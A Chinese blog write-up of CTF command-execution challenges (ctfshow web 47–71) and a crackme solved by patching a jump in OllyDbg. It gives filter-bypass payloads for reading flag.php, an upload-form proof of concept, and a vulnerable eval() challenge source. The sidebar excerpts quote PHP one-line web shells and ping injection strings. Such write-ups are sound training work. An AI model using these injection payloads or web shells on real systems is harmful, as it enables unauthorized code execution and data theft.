buuctf web入门 命令执行 逆向

最新推荐文章于 2023-07-30 21:14:07 发布
最新推荐文章于 2023-07-30 21:14:07 发布
阅读量609 收藏
点赞数
文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74228275/article/details/131547581
版权

目录

web 47

web 48~49

​编辑

 web 50

 web 51

web 52

web 53

web 54

web 55

 web 56

web 57

web 58~65

web 66

web67~68

 web69

web 70

​编辑 web 71

逆向 crack me

web 47

web 48~49

 web 50

 web 51

查看页面源代码可得

web 52

web 53

web 54

完全意义禁用了这些命令(中间加上了通配符)

/bin/?at${IFS}f???????%0a

bin表示在bin目录下检索?at命令

bin主要放置一些系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等

web 55

linux系统base64加密算法

?c=/bin/base64 flag.php;

也可以通过构造一个文件上传的数据包

<!--构造一个post上传文件的数据包,这是个上传页面,选择文件上传-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://cf2001b5-bd9e-45b1-b731-e1098870d18f.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

上传一个php文件,

通过post传参,传入cat flag.php,因为传入的文件一般都存放在tmp文件下,默认文件名为phpXXXXXX(后6个为随机的大小写字母)

然后通过get传参,访问这个文件,+在这里是一个空格的作用,?是要进行匹配的字符,[@-[]表示@到[之间的字符,这里是包括有所有大写字母。

 web 56

与web55相同,多过滤了数字

web 57

 根据题意,需要构造出36,$(())值为0,因为~a+a=-1

$((~$({_})))为-1,$((~$(())))$((~$(())))为-2,故可以通过这个构造出36

 

 或者

web 58~65

一些函数被禁用

或者是c=include "php://filter/read=convert.base64-encode/resource=flag.php";

c=highlight_file("flag.php");

c=file("flag.php");

c=file_get_contents("flag.php");

c=fgets("flag.php");

c=readfile("flag.php");(选择其中使用)

web 66

 好像找不到

列出根目录下的文件。

include包含文件,将文件内容解析成php代码执行

web67~68

print_r()被禁用了,用var_dump代替

 web69

var_dump被禁用了,可用var_export()代替

web 70

web 71

<?php

/*

# -*- coding: utf-8 -*-

# @Author: Lazzaro

# @Date:   2020-09-05 20:49:30

# @Last Modified by:   h1xa

# @Last Modified time: 2020-09-07 22:02:47

# @email: h1xa@ctfer.com

# @link: https://ctfer.com

*/

error_reporting(0);

ini_set('display_errors', 0);

// 你们在炫技吗?

if(isset($_POST['c'])){

        $c= $_POST['c'];

        eval($c);

        $s = ob_get_contents();   //读取的文件内容通过缓存区送入s中

        ob_end_clean();        //关闭并清空缓存区

        echo preg_replace("/[0-9]|[a-z]/i","?",$s);  //将s中数字字母全部换成?

}else{

    highlight_file(__FILE__);

}

可以直接让程序在eval处停止。

 

 

逆向 crack me

先运行一下,提示输入用户名和注册码,输入后,退出了

拖进onlydbg

将jnz改为je,在运行,显示 登录成功

Serendipity~~~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buuctf】Online tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3142
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
buuctf-write_shell(命令执行)
m0_62094846的博客
05-21 295
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2388
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec
weixin_42566218的博客
03-09 4112
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec 题目链接:BUUCTF 类型:命令注入 知识点:命令拼接符(||、;、&&…) 解题过程 这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数 测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显 target=127.0.0.1;ls 查看index.php源码发现目标未对参数进行任何过滤 target=127.0.0.1;cp index.php 1.txt 网页
BUUCTF[ACTF2020 新生赛]Exec
stars的博客
11-01 453
文章目录 打开连接发现网站有个ping功能,测试一下 考虑到这里会存在命令执行漏洞,利用它拿到flag 在这里补充一些相关的管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 5、;(linux下有的,和&一样的作用) 查看根目录发现f
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
Web逆向实战之protobuf
12-13
Web 逆向实战之 protobuf 在 Web 逆向实战中,protobuf 是一种常用的数据交换格式,特别是在 gRPC 等高性能 RPC 框架中。protobuf 允许开发者定义数据结构,然后使用 protocol buffer 编译器生成相应的代码,以便在...
web逆向工程(自动生成sql语句)
09-04
在IT行业中,Web逆向工程是一项重要的安全与分析技术,主要目的是通过研究Web应用程序的运行机制,揭示其内部的工作流程,以发现潜在的安全漏洞或优化性能。本话题将聚焦于如何利用工具和技术自动生成SQL语句,这在...
易语言核心支持库命令逆向
07-22
易语言核心支持库命令逆向源码,核心支持库命令逆向,播放音乐,停止播放,置剪切板文本,取剪切板文本,GetVolumeInformation,GetDiskFreeSpaceEx,GetCurrentDirectory,CreateDirectory,RemoveDirectory,CopyFile,...
逆向工程入门指南 epub电子书分享
01-06
逆向工程入门指南 epub电子书分享
BUUCTF命令执行知识点总结
qq_49833809的博客
11-13 273
命令执行知识点总结
buuctf_Exec
qq_61968245的博客
12-19 894
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 0x02 题目 打开题目就看到大大的PING,二话不说直接ping个本地ip 涉及知识点: 在命令执行的过程中,可以通过一些常用特殊字符来执行其他语句 ; //命令分割符,即当执行完第一个命令,继续执行下一个命令 | //管道 0x03 解题 那么尝试在当前文...
BUUCTF 命令执行/文件包含类型部分wp
qq_52988816的博客
11-24 7083
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
做题记录命令执行buuctfEasy Calc
zbbjya的博客
03-25 3597
题目Easy Calc 查看源代码 给提示url 还有 waf绕过 发现过滤了许多东西 查看根目录发现了flag然后我们将 用 file_get_contents() 函数先读取文件为字符串然后用 var_dump 显示字符串得到 flag 构造playload然后得到flag 题目总结 首先我们要发现是题目给的提示,当查看源代码的时候好好的去看,然后我们看到有一个waf绕过, 在不知道的情况下我们要去了解一下什么是waf绕过 然后打开php文件查看源码时命令执行的一种方式我们 根据提示开始分析看题目的
BUUCTF(7)
遇事不决冲冲冲
03-14 2773
[MRCTF2020]PYWebsite 1 [MRCTF2020]Ezpop 1 [SUCTF 2019]Pythonginx 1 [NPUCTF2020]ReadlezPHP 1 [CISCN2019 华东南赛区]Web11 1 [BSidesCF 2019]Futurella 1 [BJDCTF2020]EasySearch 1 [GYCTF2020]FlaskApp 1
BUU命令执行
aaum556的博客
07-30 102
学习完相关绕过姿势的理论基础,下面回到上面 CTF 实例题目中进行实战。了解完题目概况,下面就开始学习 CTF 中命令执行漏洞相关的绕过姿势。想要读取 flag.php 文件,就必须想办法绕过上述过滤。在这里插入图片描述秒题大概就是这种做法吧……2、禁用 cat 的方法。1、绕过空格过滤的方法。
BUU 命令执行漏洞-[ACTF2020 新生赛]Exec
Ivyyyyyy1的博客
10-17 2547
一、题目 点开页面,经典的命令执行表单 先输入几个玩玩 都是正常回显,没啥怪东西 二、解题 1. 这里会用到 管道符 有关的知识点 ① | : 即按位或,会直接执行管道符之后的语句 ② || : 即逻辑或,若管道符前语句为true则只执行前一句,否则只执行后一句 ③ & : 即按位与,会直接执行前后两个语句 ④ && : 即逻辑与,若管道符前语句为true则执行两个语句,反之都不执行 2.在Linux命令中,ls 用于列出目录条目 那...
CTFHUB 基础-----命令执行第一关
SopRomeo的博客
03-18 1223
cat 可以用,flag不在这里,找了很久都没有,最终发现可以写一句话木马进去 LINUX指令 看了web,发现要转义 1;echo "<?php @eval(\$_POST['cmd']);?>" > 2.php 不知道为啥要转义,可能linux指令要这样…或者过滤了 不能cat一大窜数字的文件,菜刀点进去看,里面有flag… ...
BUUCTF 随便注WP
小白渣的博客
12-19 1172
首先我们先看到题目,我们由题意可知是sql注入 于是用 ’ 试试 然后我们尝试一些注入的常用的词汇 发现都被过滤了,但是尝试一下 堆叠注入就可发现 ';show tables;# 看了前面大佬的博客可以 绕过关键词过滤 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQL的SQL预处理(Prepared)本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕...
Reverse_Engineering_for_Beginners-en-lite
01-24
"逆向工程入门指南 - lite版" 《逆向工程入门指南》是一本由Dennis Yurichev撰写的专业书籍,专为初学者设计,旨在提供对逆向工程基础知识的快速入门。该书于2013-2015年发布,并遵循Creative Commons Attribution-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值